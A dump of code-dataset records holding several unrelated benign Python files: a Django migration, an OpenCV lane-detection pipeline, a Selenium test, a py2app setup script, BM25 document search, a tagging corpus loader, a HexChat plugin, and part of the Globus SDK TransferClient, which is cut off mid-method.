__future__ import unicode_literals\n\nfrom django.db import models, migrations\n\n\nclass Migration(migrations.Migration):\n dependencies = [\n ('static', '0001_initial'),\n ]\n\n operations = [\n migrations.AlterField(\n model_name='file',\n name='target',\n field=models.CharField(max_length=100,\n choices=[(b'catalog.Product.images', b'Product Image'),\n (b'category.Category.image', b'Category Image')]),\n ),\n ]\n","sub_path":"src/static/migrations/0002_auto_20150623_1707.py","file_name":"0002_auto_20150623_1707.py","file_ext":"py","file_size_in_byte":573,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"225746284","text":"import cProfile\nimport json\nimport argparse\nimport glob\nimport collections\nimport itertools\n\nimport cv2\nimport numpy as np\nimport os\n\n\ndef region_of_interest(img, vertices):\n mask = np.zeros_like(img)\n\n if len(img.shape) > 2:\n channel_count = img.shape[2]\n select_mask_color = (255,) * channel_count\n else:\n select_mask_color = 255\n\n cv2.fillPoly(mask, vertices, select_mask_color)\n\n return cv2.bitwise_and(img, mask)\n\n\ndef sliding_window_search(nonzeroy, nonzerox, y_size, base, search_img):\n nwindows = 8\n window_height = np.int(y_size / nwindows)\n current = base\n margin = 40\n minpix = 10\n lane_inds = []\n\n for window in range(nwindows):\n win_y_low = y_size - (window + 1) * window_height\n win_y_high = y_size - window * window_height\n win_x_low = current - margin\n win_x_high = current + margin\n good_inds_mask = ((nonzeroy >= win_y_low) & (nonzeroy < win_y_high)\n & (nonzerox >= win_x_low) & (nonzerox < win_x_high))\n good_inds = good_inds_mask.nonzero()[0]\n\n lane_inds.append(good_inds)\n\n if len(good_inds) > minpix:\n current = np.int(np.mean(nonzerox[good_inds]))\n\n if search_img is not None:\n cv2.rectangle(search_img, (win_x_low, win_y_low), (win_x_high, win_y_high), 255, 2)\n\n lane_inds = np.concatenate(lane_inds)\n\n return nonzeroy[lane_inds], nonzerox[lane_inds]\n\n\ndef crop_image(input_img):\n y_size = input_img.shape[0]\n if input_img.shape[0] != 128:\n raise Exception(\"expected y dimension 128 but got: %d\" % y_size)\n cropped = input_img[88:, :, :]\n assert cropped.shape[0] == 40\n assert cropped.shape[1] == 160\n return cropped\n\n\nPipelineResult = collections.namedtuple(\"PipelineResult\",\n [\"input_img\", \"cropped\",\n \"sobel_h_x\", \"sobel_h_y\", \"sobel_h_mag\",\n \"sobel_h_mag_scaled\", \"sobel_h_thresholded\",\n \"sobel_s_thresholded\",\n \"l_threshold_mask\",\n \"yellow_mask\",\n \"binary\",\n \"search_img\",\n \"hls\", \"blurred_s\",\n \"sobel_s_mag_scaled\",\n \"blurred_h\",\n \"warped_input\",\n \"warped\", \"num_pts\", \"linex\", \"liney\",\n \"line_fit\"])\n\n\ndef get_yellow_mask(hls):\n lower_yellow = (21.25, 75, 40)\n # lower_yellow = (21.25, 75, 100.0)\n upper_yellow = (50, 178.5, 255)\n mask = cv2.inRange(hls, lower_yellow, upper_yellow)\n return mask\n\n\ndef get_ground_polygon():\n d1 = (0, 40) # bottom left of polygon\n d2 = (62, 0) # top left of polygon\n d3 = (98, 0) # top right of polygon\n d4 = (160, 40) # bottom right of polygon\n return np.int32([d1, d2, d3, d4])\n\n\ndef _perspective_mat_dst():\n d1 = (40, 40) # bottom mid-left\n d2 = (40, 0) # top mid-left\n d3 = (120, 0) # top mid-right\n d4 = (120, 40) # bottom mid-right\n return np.float32([d1, d2, d3, d4])\n\nclass Processor(object):\n\n def __init__(self, mtx, dist):\n self.mtx = mtx\n self.dist = dist\n src = get_ground_polygon().astype(np.float32)\n dst = _perspective_mat_dst()\n self.perspective_mat = cv2.getPerspectiveTransform(src, dst)\n self.perspective_mat_inv = cv2.getPerspectiveTransform(dst, src)\n\n def undistort(self, cropped):\n if self.mtx is not None:\n return cv2.undistort(cropped, mtx, dist, None, mtx)\n else:\n return cropped\n\n def inv_warp(self, img):\n return cv2.warpPerspective(\n img, self.perspective_mat_inv, (160, 40), flags=cv2.INTER_LINEAR)\n\n def warp(self, img):\n # copy = np.copy(img)\n # cv2.polylines(copy, [get_ground_polygon()], True, [255, 0, 255], 5)\n return cv2.warpPerspective(\n img, self.perspective_mat, (160, 40), flags=cv2.INTER_LINEAR)\n\n\n def process(self, input_img, debug=False):\n cropped = crop_image(input_img)\n\n y_size = 40\n x_size = 160\n assert cropped.shape[0] == y_size\n assert cropped.shape[1] == x_size\n\n undistorted = self.undistort(cropped)\n\n hls = cv2.cvtColor(cropped, cv2.COLOR_BGR2HLS)\n h_channel = hls[:, :, 0]\n l_channel = hls[:, :, 1]\n s_channel = hls[:, :, 2]\n\n blurred_s = cv2.GaussianBlur(s_channel, (5, 5), 0)\n blurred_h = cv2.GaussianBlur(h_channel, (5, 5), 0)\n\n yellow_mask = get_yellow_mask(hls)\n\n l_threshold_mask = cv2.inRange(l_channel, 50, 255)\n\n sobel_h_x = cv2.Sobel(blurred_h, cv2.CV_64F, 1, 0, ksize=5)\n sobel_h_y = cv2.Sobel(blurred_h, cv2.CV_64F, 0, 1, ksize=5)\n sobel_h_mag = np.sqrt(sobel_h_x ** 2 + sobel_h_y ** 2)\n sobel_h_mag = cv2.bitwise_and(sobel_h_mag, sobel_h_mag, mask=yellow_mask)\n\n sobel_h_scale_factor = np.max(sobel_h_mag) / 255\n if sobel_h_scale_factor > 0:\n sobel_h_mag_scaled = sobel_h_mag / sobel_h_scale_factor\n else:\n sobel_h_mag_scaled = sobel_h_mag\n sobel_h_threshold_mask = cv2.inRange(sobel_h_mag_scaled, 50, 255)\n sobel_h_thresholded = cv2.bitwise_and(sobel_h_mag_scaled, sobel_h_mag_scaled, mask=sobel_h_threshold_mask)\n\n sobel_s_x = cv2.Sobel(blurred_s, cv2.CV_64F, 1, 0, ksize=5)\n sobel_s_y = cv2.Sobel(blurred_s, cv2.CV_64F, 0, 1, ksize=5)\n sobel_s_mag = np.sqrt(sobel_s_x ** 2 + sobel_s_y ** 2)\n sobel_s_mag = cv2.bitwise_and(sobel_s_mag, sobel_s_mag, mask=yellow_mask)\n\n sobel_s_scale_factor = np.max(sobel_s_mag) / 255\n if sobel_s_scale_factor > 0:\n sobel_s_mag_scaled = sobel_s_mag / sobel_s_scale_factor\n else:\n sobel_s_mag_scaled = sobel_s_mag\n sobel_s_threshold_mask = cv2.inRange(sobel_s_mag_scaled, 50, 255)\n sobel_s_thresholded = cv2.bitwise_and(sobel_s_mag_scaled, sobel_s_mag_scaled, mask=sobel_s_threshold_mask)\n\n binary = np.ones_like(s_channel)\n binary = cv2.bitwise_and(binary, binary, mask=sobel_h_threshold_mask)\n binary = cv2.bitwise_and(binary, binary, mask=sobel_s_threshold_mask)\n\n if debug:\n warped_input = self.warp(cropped)\n else:\n warped_input = None\n\n warped_binary = self.warp(binary)\n\n histogram = np.sum(warped_binary[20:, :], axis=0)\n nonzero = warped_binary.nonzero()\n nonzeroy = np.array(nonzero[0])\n nonzerox = np.array(nonzero[1])\n x_base = np.argmax(histogram)\n\n if debug:\n search_img = np.zeros_like(warped_binary)\n else:\n search_img = None\n\n liney, linex = sliding_window_search(nonzeroy, nonzerox, y_size, x_base, search_img)\n num_pts = len(linex)\n if num_pts >= 10:\n line_fit = np.polyfit(liney, linex, 1)\n else:\n line_fit = None\n\n return PipelineResult(\n input_img=input_img,\n yellow_mask=yellow_mask,\n sobel_h_x=sobel_h_x,\n l_threshold_mask=l_threshold_mask,\n sobel_h_y=sobel_h_y,\n sobel_h_mag=sobel_h_mag,\n sobel_h_mag_scaled=sobel_h_mag_scaled,\n sobel_s_mag_scaled=sobel_s_mag_scaled,\n sobel_h_thresholded=sobel_h_thresholded,\n sobel_s_thresholded=sobel_s_thresholded,\n cropped=cropped,\n hls=hls,\n search_img=search_img,\n binary=binary,\n blurred_s=blurred_s,\n blurred_h=blurred_h,\n warped_input=warped_input,\n warped=warped_binary,\n liney=liney,\n linex=linex,\n line_fit=line_fit,\n num_pts=num_pts)\n\n\ndef handle_filepath(args, processor, filepath, report_file):\n bgr_image = load_bgr_image(filepath)\n result = processor.process(bgr_image)\n if report_file is not None:\n doc = {}\n doc['image'] = filepath\n if result.line_fit is None:\n doc['fit'] = False\n else:\n doc['fit'] = True\n doc['weight'] = result.num_pts\n doc['c0'] = result.line_fit[0]\n doc['c1'] = result.line_fit[1]\n json.dump(doc, report_file)\n report_file.write(\"\\n\")\n report_file.flush()\n\n\ndef load_bgr_image(bgr_filepath):\n bgr_array = np.fromfile(bgr_filepath, dtype=np.uint8)\n bgr_image = bgr_array.reshape(128, 160, 3)\n return bgr_image\n\n\ndef run3(args, processor, report_file):\n if args.imgfile is not None:\n with open(args.imgfile, \"r\") as infile:\n while True:\n line = infile.readline()\n if line is None:\n break\n filepath = line.rstrip()\n handle_filepath(args, processor, filepath, report_file)\n else:\n bgr_filepaths = list(glob.glob(os.path.join(args.imgdir, \"*.bgr\")))\n if args.ntake is not None:\n bgr_filepaths = take(args.ntake, bgr_filepaths)\n for filepath in bgr_filepaths:\n handle_filepath(args, processor, filepath, report_file)\n\n\ndef run2(args, processor):\n run3(args, processor, args.report)\n\n\ndef run1(args):\n if args.calibration is not None:\n with open(args.calibration, \"r\") as infile:\n doc = json.load(infile)\n mtx = np.array(doc['mtx'])\n dist = np.array(doc['dist'])\n processor = Processor(mtx, dist)\n else:\n processor = Processor(None, None)\n\n run2(args, processor)\n\n\ndef take(n, iterable):\n \"Return first n items of the iterable as a list\"\n return list(itertools.islice(iterable, n))\n\n\ndef parse_args():\n parser = argparse.ArgumentParser()\n parser.add_argument(\"--demo\", action=\"store_true\")\n parser.add_argument(\"--imgdir\", default=\"/dev/shm/bgr\")\n parser.add_argument(\"--ntake\", default=None, type=int)\n parser.add_argument(\"--imgfile\")\n parser.add_argument(\"--report\", type=argparse.FileType('w'))\n parser.add_argument(\"--calibration\")\n args = parser.parse_args()\n return args\n\n\ndef demo():\n args = parse_args()\n run1(args)\n\n\ndef main():\n args = parse_args()\n\n if args.demo:\n cProfile.run('demo()', sort='cumulative')\n else:\n run1(args)\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"lines/pipeline.py","file_name":"pipeline.py","file_ext":"py","file_size_in_byte":9793,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"516968808","text":"from time import sleep\n\nfrom selenium import webdriver\nfrom selenium.webdriver import TouchActions\n\n\nclass TestTouchAc():\n def setup(self):\n op = webdriver.ChromeOptions()\n op.add_experimental_option('w3c', False)\n self.driver = webdriver.Chrome(options=op)\n self.driver.implicitly_wait(10)\n self.driver.maximize_window()\n\n def teardown(self):\n self.driver.quit()\n\n def test_touchaction_scrollbottom(self):\n self.driver.get(\"https://www.baidu.com\")\n self.driver.find_element_by_id(\"kw\").send_keys(\"selenium\")\n self.driver.find_element_by_id(\"su\").click()\n\n action_search = TouchActions(self.driver)\n action_search.tap(self.driver.find_element_by_id(\"su\")).perform()\n el = self.driver.find_element_by_id(\"su\")\n action = TouchActions(self.driver)\n\n action.scroll_from_element(el, 10, 10000).perform()\n self.driver.find_element_by_css_selector('#page_addmeber > div > a.n').click()\n sleep(3)\n\n\n\n","sub_path":"cekai/Hogwarts_selenium_Exercise/pytest_exercise_selenium/Exercise_selenium/test_TouchAction.py","file_name":"test_TouchAction.py","file_ext":"py","file_size_in_byte":1013,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"439059437","text":"\"\"\"\npy2app/py2exe build script for MyApplication.\n\nWill automatically ensure that all build prerequisites are available\nvia ez_setup\n\nUsage (Mac OS X):\npython setup.py py2app\n\nUsage (Windows):\npython setup.py py2exe\n\"\"\"\nimport ez_setup\nez_setup.use_setuptools()\n\nimport sys\nfrom setuptools import setup\n\nAPP = 'Python/ISDPR.py'\n\nif sys.platform == 'darwin':\n extra_options = dict(\n setup_requires=['py2app'],\n app=[APP],\n # Set the application icon\n options=dict(\n py2app=dict(iconfile='Icons/icon.icns')),\n )\nelif sys.platform == 'win32':\n extra_options = dict(\n setup_requires=['py2exe'],\n app=[APP],\n ) \nelse:\n extra_options = dict(\n # Normally unix-like platforms will use \"setup.py install\"\n # and install the main script as such\n scripts=[APP],\n ) \n\nsetup(\n name=\"ISDPR\",\n **extra_options\n)","sub_path":"src/master_setup.py","file_name":"master_setup.py","file_ext":"py","file_size_in_byte":898,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"583525088","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sat Dec 12 23:55:57 2020\n\n@author: hongfei7\n\"\"\"\n\nimport gensim\nfrom gensim.summarization import bm25\nimport os\nimport heapq\nimport spacy\n\n# NLTK\nfrom nltk.stem import PorterStemmer\n\nfilenames = []\n\ndef tokenization(filename):\n result = []\n filepath = \"corpus/\" + filename\n with open(filepath, 'r') as f:\n text = f.read()\n words = text.split('\\t')\n for word in words:\n if word != \"\":\n result.append(word)\n return result\n\ndef read_corpus(dir_path):\n corpus = [];\n for root,dirs,files in os.walk(dir_path):\n for f in files:\n if f == \".DS_Store\":\n continue\n corpus.append(tokenization(f))\n #print(\"file is :\" + f)\n new_filename = f.split(\".\")[0] + \".pdf\"\n filenames.append(new_filename)\n print(\"Corpus size is :\" + str(len(corpus)))\n return corpus\n # dictionary = corpora.Dictionary(corpus)\n # print len(dictionary)\n\nif __name__ == \"__main__\":\n dir_path = 'corpus/'\n \n # BM25 Model\n texts = read_corpus(dir_path)\n bm25Model = bm25.BM25(texts)\n \n # Doc Cosine Similarity\n dictionary = gensim.corpora.Dictionary(texts)\n corpus = [dictionary.doc2bow(doc) for doc in texts]\n \n tf_idf = gensim.models.TfidfModel(corpus)\n index = gensim.similarities.SparseMatrixSimilarity(tf_idf[corpus], num_features=len(dictionary))\n \n nlp = spacy.load('en_core_web_sm', disable=['parser', 'ner'])\n allowed_postags = ['NOUN', 'ADJ', 'VERB', 'ADV']\n \n while True:\n search_type = input(\"Please input your search type (bm25 or sim): \")\n query_str = input(\"Please input your query: \")\n \n \n query = []\n for word in query_str.strip().split():\n query.append(word.lower())\n lemmatized = []\n res = nlp(\" \".join(query))\n for token in res:\n lemmatized.append(token.lemma_)\n #print(lemmatized)\n # STEMMING\n stemmer = PorterStemmer()\n stemmed = [stemmer.stem(x) for x in lemmatized]\n query = stemmed\n \n if search_type == \"bm25\":\n scores = bm25Model.get_scores(query)\n \n # get the top 10 indexes\n indexes = heapq.nlargest(10, range(len(scores)), scores.__getitem__)\n \n # get the top 10 values\n values = heapq.nlargest(10,scores)\n \n # print(indexes)\n print(values)\n \n for i in indexes:\n print(filenames[i])\n\n elif search_type == \"sim\":\n query_doc_bow = dictionary.doc2bow(query)\n sims = index[tf_idf[query_doc_bow]]\n \n indexes = heapq.nlargest(10, range(len(sims)), sims.__getitem__)\n \n values = heapq.nlargest(10,sims)\n \n # print(indexes)\n print(values)\n \n for i in indexes:\n print(filenames[i])\n else:\n print(\"Invalid type!\\n\")\n","sub_path":"Recommend_Slides/search.py","file_name":"search.py","file_ext":"py","file_size_in_byte":3097,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"269138984","text":"from Features import Features\n\ndef load_data_and_create_features(path, dataset='Train', Features_Object = None):\n with open(path) as f:\n content = f.readlines()\n content = [x.strip() for x in content]\n words_set, tags_set = get_words_and_tags_set(content)\n if dataset=='Train':\n features_object = Features(words_set,tags_set)\n elif dataset=='Test':\n features_object = Features_Object\n word_possible_labels = {}\n words = []\n tags = []\n features = []\n print('creating words,tags and features')\n for idx, line in enumerate(content):\n #uncomment if we want to add ** in start of santance\n words.extend(['*', '*'])\n tags.extend(['*', '*'])\n features.extend([[],[]])\n splited_line = line.split()\n for i,word_tag in enumerate(splited_line):\n word, tag = word_tag.split('_')\n words.append(word)\n tags.append(tag)\n try:\n next_word, _ = splited_line[i+1].split('_')\n except IndexError:\n next_word = 'STOP'\n current_word_features = features_object.set_features_for_word(words[-3:],tags[-3:],next_word)\n features.append(current_word_features)\n #test\n #features_object.multiply_features_with_weighets(features[-1])\n #if word exists append tag to wotds list, else create a list and append the tag\n #word_possible_labels.setdefault(word, []).append(tag)\n words.append('STOP')\n tags.append('STOP')\n features.extend([[]])\n return words,tags,features,features_object\n\ndef get_words_and_tags_set(content):\n words_set = set()\n tags_set = set()\n for line in content:\n for word_tag in line.split():\n word, tag = word_tag.split('_')\n words_set.add(word)\n tags_set.add(tag)\n words_set.add('STOP')\n words_set.add('*')\n tags_set.add('STOP')\n tags_set.add('*')\n return words_set, tags_set\n\ndef create_word_tag_pairs(words_set,tags_set):\n word_tag_pairs = set()\n for tag in tags_set:\n for word in words_set:\n word_tag_pairs.add((tag,word))\n word_tag_pairs.add(('STOP','STOP'))\n\n\n\nif __name__ == '__main__':\n words, tags, features, Features_object = load_data_and_create_features('data/train.wtag','Train')\n load_data_and_create_features('data/test.wtag', 'Test', Features_object)\n\n\n","sub_path":"load_corpus.py","file_name":"load_corpus.py","file_ext":"py","file_size_in_byte":2422,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"291838999","text":"# rbtext.py by ApolloJustice\n# for use with Python 3\n# non PEP-8 compliant because honestly fuck that\n# probably not commented because too lazy\n\n__module_name__ = \"RainbowFonts\"\n__module_version__ = \"1.0\"\n__module_description__ = \"Rainbowifies text\"\n__author__ = \"ApolloJustice\"\n\nimport hexchat\nimport random\n\ndef rainbow(word, word_eol, userdata):\n\n\trainbowstr = \"\"\n\n\tfor character in word_eol[1]: rainbowstr += '\\003' + str(random.randint(2, 15)) + character\n\n\thexchat.command(\"say \" + rainbowstr)\n\trainbowstr = \"\"\n\treturn hexchat.EAT_ALL\n\nhexchat.hook_command(\"rb\", rainbow, help=\"/rb rainbowifies text\")\nhexchat.emit_print(\"Notice\", __module_name__ + \" [S]\", \"%s by %s loaded. You are using version %s of the script.\" % (__module_name__, __author__, __module_version__))","sub_path":"rbtext.py","file_name":"rbtext.py","file_ext":"py","file_size_in_byte":774,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"128792859","text":"import logging\nimport time\nimport uuid\nfrom typing import Any, Dict, Iterable, List, Optional, Union\n\nfrom globus_sdk import client, exc, paging, response, utils\nfrom globus_sdk.scopes import TransferScopes\n\nfrom .errors import TransferAPIError\nfrom .response import ActivationRequirementsResponse, IterableTransferResponse\n\nlog = logging.getLogger(__name__)\n\nID_PARAM_TYPE = Union[bytes, str, uuid.UUID]\n\n\ndef _get_page_size(paged_result):\n return len(paged_result[\"DATA\"])\n\n\nclass TransferClient(client.BaseClient):\n r\"\"\"\n Client for the\n `Globus Transfer API `_.\n\n This class provides helper methods for most common resources in the\n REST API, and basic ``get``, ``put``, ``post``, and ``delete`` methods\n from the base rest client that can be used to access any REST resource.\n\n Detailed documentation is available in the official REST API\n documentation, which is linked to from the method documentation. Methods\n that allow arbitrary keyword arguments will pass the extra arguments as\n query parameters.\n\n :param authorizer: An authorizer instance used for all calls to\n Globus Transfer\n :type authorizer: :class:`GlobusAuthorizer\\\n `\n\n **Paginated Calls**\n\n Methods which support pagination can be called as paginated or unpaginated methods.\n If the method name is ``TransferClient.foo``, the paginated version is\n ``TransferClient.paginated.foo``.\n Using ``TransferClient.endpoint_search`` as an example::\n\n from globus_sdk import TransferClient\n tc = TransferClient(...)\n\n # this is the unpaginated version\n for x in tc.endpoint_search(\"tutorial\"):\n print(\"Endpoint ID: {}\".format(x[\"id\"]))\n\n # this is the paginated version\n for page in tc.paginated.endpoint_search(\"testdata\"):\n for x in page:\n print(\"Endpoint ID: {}\".format(x[\"id\"]))\n\n .. automethodlist:: globus_sdk.TransferClient\n \"\"\"\n service_name = \"transfer\"\n base_path = \"/v0.10/\"\n error_class = TransferAPIError\n scopes = TransferScopes\n\n # Convenience methods, providing more pythonic access to common REST\n # resources\n\n #\n # Endpoint Management\n #\n\n def get_endpoint(\n self, endpoint_id: ID_PARAM_TYPE, query_params: Optional[Dict[str, Any]] = None\n ) -> response.GlobusHTTPResponse:\n \"\"\"\n ``GET /endpoint/``\n\n :rtype: :class:`TransferResponse\n `\n\n **Examples**\n\n >>> tc = globus_sdk.TransferClient(...)\n >>> endpoint = tc.get_endpoint(endpoint_id)\n >>> print(\"Endpoint name:\",\n >>> endpoint[\"display_name\"] or endpoint[\"canonical_name\"])\n\n **External Documentation**\n\n See\n `Get Endpoint by ID \\\n `_\n in the REST documentation for details.\n \"\"\"\n endpoint_id_s = utils.safe_stringify(endpoint_id)\n log.info(f\"TransferClient.get_endpoint({endpoint_id_s})\")\n path = self.qjoin_path(\"endpoint\", endpoint_id_s)\n return self.get(path, query_params=query_params)\n\n def update_endpoint(\n self,\n endpoint_id: ID_PARAM_TYPE,\n data,\n query_params: Optional[Dict[str, Any]] = None,\n ) -> response.GlobusHTTPResponse:\n \"\"\"\n ``PUT /endpoint/``\n\n :rtype: :class:`TransferResponse\n `\n\n **Examples**\n\n >>> tc = globus_sdk.TransferClient(...)\n >>> epup = dict(display_name=\"My New Endpoint Name\",\n >>> description=\"Better Description\")\n >>> update_result = tc.update_endpoint(endpoint_id, epup)\n\n **External Documentation**\n\n See\n `Update Endpoint by ID \\\n `_\n in the REST documentation for details.\n \"\"\"\n if data.get(\"myproxy_server\"):\n if data.get(\"oauth_server\"):\n raise exc.GlobusSDKUsageError(\n \"an endpoint cannot be reconfigured to use multiple \"\n \"identity providers for activation; specify either \"\n \"MyProxy or OAuth, not both\"\n )\n else:\n data[\"oauth_server\"] = None\n elif data.get(\"oauth_server\"):\n data[\"myproxy_server\"] = None\n\n endpoint_id_s = utils.safe_stringify(endpoint_id)\n log.info(f\"TransferClient.update_endpoint({endpoint_id_s}, ...)\")\n path = self.qjoin_path(\"endpoint\", endpoint_id_s)\n return self.put(path, data=data, query_params=query_params)\n\n def create_endpoint(self, data) -> response.GlobusHTTPResponse:\n \"\"\"\n ``POST /endpoint/``\n\n :rtype: :class:`TransferResponse\n `\n\n **Examples**\n\n >>> tc = globus_sdk.TransferClient(...)\n >>> ep_data = {\n >>> \"DATA_TYPE\": \"endpoint\",\n >>> \"display_name\": display_name,\n >>> \"DATA\": [\n >>> {\n >>> \"DATA_TYPE\": \"server\",\n >>> \"hostname\": \"gridftp.example.edu\",\n >>> },\n >>> ],\n >>> }\n >>> create_result = tc.create_endpoint(ep_data)\n >>> endpoint_id = create_result[\"id\"]\n\n **External Documentation**\n\n See\n `Create endpoint \\\n `_\n in the REST documentation for details.\n \"\"\"\n if data.get(\"myproxy_server\") and data.get(\"oauth_server\"):\n raise exc.GlobusSDKUsageError(\n \"an endpoint cannot be created using multiple identity \"\n \"providers for activation; specify either MyProxy or OAuth, \"\n \"not both\"\n )\n\n log.info(\"TransferClient.create_endpoint(...)\")\n return self.post(\"endpoint\", data=data)\n\n def delete_endpoint(\n self, endpoint_id: ID_PARAM_TYPE\n ) -> response.GlobusHTTPResponse:\n \"\"\"\n ``DELETE /endpoint/``\n\n :rtype: :class:`TransferResponse\n `\n\n **Examples**\n\n >>> tc = globus_sdk.TransferClient(...)\n >>> delete_result = tc.delete_endpoint(endpoint_id)\n\n **External Documentation**\n\n See\n `Delete endpoint by id \\\n `_\n in the REST documentation for details.\n \"\"\"\n endpoint_id_s = utils.safe_stringify(endpoint_id)\n log.info(f\"TransferClient.delete_endpoint({endpoint_id_s})\")\n path = self.qjoin_path(\"endpoint\", endpoint_id_s)\n return self.delete(path)\n\n @paging.has_paginator(\n paging.HasNextPaginator,\n items_key=\"DATA\",\n get_page_size=_get_page_size,\n max_total_results=1000,\n page_size=100,\n )\n def endpoint_search(\n self,\n filter_fulltext: Optional[str] = None,\n filter_scope: Optional[str] = None,\n filter_owner_id: Optional[str] = None,\n filter_host_endpoint: Optional[ID_PARAM_TYPE] = None,\n filter_non_functional: Optional[bool] = None,\n limit: Optional[int] = None,\n offset: Optional[int] = None,\n query_params: Optional[Dict[str, Any]] = None,\n ) -> IterableTransferResponse:\n r\"\"\"\n .. parsed-literal::\n\n GET /endpoint_search\\\n ?filter_fulltext=&filter_scope=\n\n :param filter_fulltext: The string to use in a full text search on endpoints.\n Effectively, the \"search query\" which is being requested. May be omitted\n with specific ``filter_scope`` values.\n :type filter_fulltext: str, optional\n :param filter_scope: A \"scope\" within which to search for endpoints. This must\n be one of the limited and known names known to the service, which can be\n found documented in the **External Documentation** below. Defaults to\n searching all endpoints (in which case ``filter_fulltext`` is required)\n :type filter_scope: str, optional\n :param filter_owner_id: Limit search to endpoints owned by the specified Globus\n Auth identity. Conflicts with scopes 'my-endpoints', 'my-gcp-endpoints', and\n 'shared-by-me'.\n :type filter_owner_id: str, optional\n :param filter_host_endpoint: Limit search to endpoints hosted by the specified\n endpoint. May cause BadRequest or PermissionDenied errors if the endpoint ID\n given is not valid for this operation.\n :type filter_host_endpoint: str, optional\n :param filter_non_functional: Limit search to endpoints which have the\n 'non_functional' flag set to True or False.\n :type filter_non_functional: bool, optional\n :param limit: limit the number of results\n :type limit: int, optional\n :param offset: offset used in paging\n :type offset: int, optional\n :param query_params: Any additional parameters will be passed through\n as query params.\n :type query_params: dict, optional\n :rtype: :class:`IterableTransferResponse\n `\n\n **Examples**\n\n Search for a given string as a fulltext search:\n\n >>> tc = globus_sdk.TransferClient(...)\n >>> for ep in tc.endpoint_search('String to search for!'):\n >>> print(ep['display_name'])\n\n Search for a given string, but only on endpoints that you own:\n\n >>> for ep in tc.endpoint_search('foo', filter_scope='my-endpoints'):\n >>> print('{0} has ID {1}'.format(ep['display_name'], ep['id']))\n\n It is important to be aware that the Endpoint Search API limits\n you to 1000 results for any search query.\n\n **External Documentation**\n\n For additional information, see `Endpoint Search\n `_.\n in the REST documentation for details.\n \"\"\"\n if query_params is None:\n query_params = {}\n if filter_scope is not None:\n query_params[\"filter_scope\"] = filter_scope\n if filter_fulltext is not None:\n query_params[\"filter_fulltext\"] = filter_fulltext\n if filter_owner_id is not None:\n query_params[\"filter_owner_id\"] = filter_owner_id\n if filter_host_endpoint is not None: # convert to str (may be UUID)\n query_params[\"filter_host_endpoint\"] = utils.safe_stringify(\n filter_host_endpoint\n )\n if filter_non_functional is not None: # convert to int (expect bool input)\n query_params[\"filter_non_functional\"] = 1 if filter_non_functional else 0\n if limit is not None:\n query_params[\"limit\"] = limit\n if offset is not None:\n query_params[\"offset\"] = offset\n log.info(f\"TransferClient.endpoint_search({query_params})\")\n return IterableTransferResponse(\n self.get(\"endpoint_search\", query_params=query_params)\n )\n\n def endpoint_autoactivate(\n self,\n endpoint_id: ID_PARAM_TYPE,\n if_expires_in: Optional[int] = None,\n query_params: Optional[Dict[str, Any]] = None,\n ) -> response.GlobusHTTPResponse:\n r\"\"\"\n ``POST /endpoint//autoactivate``\n\n :rtype: :class:`TransferResponse\n `\n\n The following example will try to \"auto\" activate the endpoint\n using a credential available from another endpoint or sign in by\n the user with the same identity provider, but only if the\n endpoint is not already activated or going to expire within an\n hour (3600 seconds). If that fails, direct the user to the\n globus website to perform activation:\n\n **Examples**\n\n >>> tc = globus_sdk.TransferClient(...)\n >>> r = tc.endpoint_autoactivate(ep_id, if_expires_in=3600)\n >>> while (r[\"code\"] == \"AutoActivationFailed\"):\n >>> print(\"Endpoint requires manual activation, please open \"\n >>> \"the following URL in a browser to activate the \"\n >>> \"endpoint:\")\n >>> print(\"https://app.globus.org/file-manager?origin_id=%s\"\n >>> % ep_id)\n >>> input(\"Press ENTER after activating the endpoint:\")\n >>> r = tc.endpoint_autoactivate(ep_id, if_expires_in=3600)\n\n This is the recommended flow for most thick client applications,\n because many endpoints require activation via OAuth MyProxy,\n which must be done in a browser anyway. Web based clients can\n link directly to the URL.\n\n You also might want messaging or logging depending on why and how the\n operation succeeded, in which case you'll need to look at the value of\n the \"code\" field and either decide on your own messaging or use the\n response's \"message\" field.\n\n >>> tc = globus_sdk.TransferClient(...)\n >>> r = tc.endpoint_autoactivate(ep_id, if_expires_in=3600)\n >>> if r['code'] == 'AutoActivationFailed':\n >>> print('Endpoint({}) Not Active! Error! Source message: {}'\n >>> .format(ep_id, r['message']))\n >>> sys.exit(1)\n >>> elif r['code'] == 'AutoActivated.CachedCredential':\n >>> print('Endpoint({}) autoactivated using a cached credential.'\n >>> .format(ep_id))\n >>> elif r['code'] == 'AutoActivated.GlobusOnlineCredential':\n >>> print(('Endpoint({}) autoactivated using a built-in Globus '\n >>> 'credential.').format(ep_id))\n >>> elif r['code'] = 'AlreadyActivated':\n >>> print('Endpoint({}) already active until at least {}'\n >>> .format(ep_id, 3600))\n\n **External Documentation**\n\n See\n `Autoactivate endpoint \\\n `_\n in the REST documentation for details.\n \"\"\"\n endpoint_id_s = utils.safe_stringify(endpoint_id)\n if query_params is None:\n query_params = {}\n if if_expires_in is not None:\n query_params[\"if_expires_in\"] = if_expires_in\n log.info(f\"TransferClient.endpoint_autoactivate({endpoint_id_s})\")\n path = self.qjoin_path(\"endpoint\", endpoint_id_s, \"autoactivate\")\n return self.post(path, query_params=query_params)\n\n def endpoint_deactivate(\n self, endpoint_id: ID_PARAM_TYPE, query_params: Optional[Dict[str, Any]] = None\n ) -> response.GlobusHTTPResponse:\n \"\"\"\n ``POST /endpoint//deactivate``\n\n :rtype: :class:`TransferResponse\n `\n\n **External Documentation**\n\n See\n `Deactive endpoint \\\n `_\n in the REST documentation for details.\n \"\"\"\n endpoint_id_s = utils.safe_stringify(endpoint_id)\n log.info(f\"TransferClient.endpoint_deactivate({endpoint_id_s})\")\n path = self.qjoin_path(\"endpoint\", endpoint_id_s, \"deactivate\")\n return self.post(path, query_params=query_params)\n\n def endpoint_activate(\n self,\n endpoint_id: 